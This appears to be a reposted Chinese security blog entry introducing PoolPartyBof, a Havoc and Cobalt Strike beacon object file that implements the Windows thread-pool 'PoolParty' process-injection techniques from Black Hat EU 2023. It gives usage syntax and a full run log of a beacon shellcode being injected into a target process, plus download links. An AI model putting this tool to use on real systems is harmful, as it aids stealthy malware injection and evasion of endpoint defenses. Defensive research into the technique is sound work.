前言
国外安全研究员@Alon Leviev在Black Hat EU 2023大会上分享的一个滥用Windows线程池的完全无法检测的进程注入技术的集合,标题为:The Pool Party You Will Never Forget: New Process Injection Techniques Using Windows Thread Pools,演讲PPT可在以下地址获取。
https:
/
/www.blackhat.com/eu
-
23
/briefings/schedule/
#the-pool-party-you-will-never-forget-new-process-injection-techniques-using-windows-thread-pools-35446
插件介绍
作者基于@SafeBreach和@0xDeku的PoolParty进程注入技术(滥用Windows线程池)实现的BOF信标对象文件,可在havoc、cobaltstrike中使用。
将TP_IO工作项插入目标进程的线程池。
将TP_ALPC工作项插入目标进程的线程池。
将TP_JOB工作项插入目标进程的线程池。
将TP_DIRECT工作项插入目标进程的线程池。
将TP_TIMER工作项插入目标进程的线程池
插件用法
PoolPartyBof
<
Process
ID
>
<
Path
To
Shellcode
>
<
Variant
>
PoolPartyBof
2136
/tmp/beacon_x64.bin
4
[*] Opening
2136
and running PoolParty with /tmp/beacon_x64.bin shellcode!
[+] host called home, sent:
314020
bytes
[+] received output:
[INFO] Shellcode Size:
307200
bytes
[+] received output:
[INFO] Starting PoolParty attack against
process
id:
2136
[+] received output:
[INFO] Retrieved handle to the target
process
:
0000000000000670
[+] received output:
[INFO] Hijacked worker factory handle from the target
process
:
000000
C96E0FF5B8
[+] received output:
[INFO] Hijacked timer queue handle from the target
process
:
000000
C96E0FF5B8
[+] received output:
[INFO] Allocated shellcode memory
in
the target
process
:
00000290
C91B0000
[+] received output:
[INFO] Written shellcode to the target
process
[+] received output:
[INFO] Retrieved target worker factory basic information
[+] received output:
[INFO] Created TP_TIMER structure associated with the shellcode
[+] received output:
[INFO] Allocated TP_TIMER memory
in
the target
process
:
00000290
C9200000
[+] received output:
[INFO] Written the specially crafted TP_TIMER structure to the target
process
[+] received output:
[INFO] Modified the target
process
's TP_POOL timer queue WindowsStart and Windows End to point to the specially crafted TP_TIMER
[+] received output:
[INFO] Set the timer queue to expire to trigger the dequeueing TppTimerQueueExpiration
[+] received output:
[INFO] PoolParty attack completed.
BOF 可以进一步与Cobaltstrike 中提供的Process Injection Hooks一起使用,Rastamouse也有一个完美的博客。
下载地址
https://github.com/0xEr3bus/PoolPartyBof
https://github.com/SafeBreach-Labs/PoolParty
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论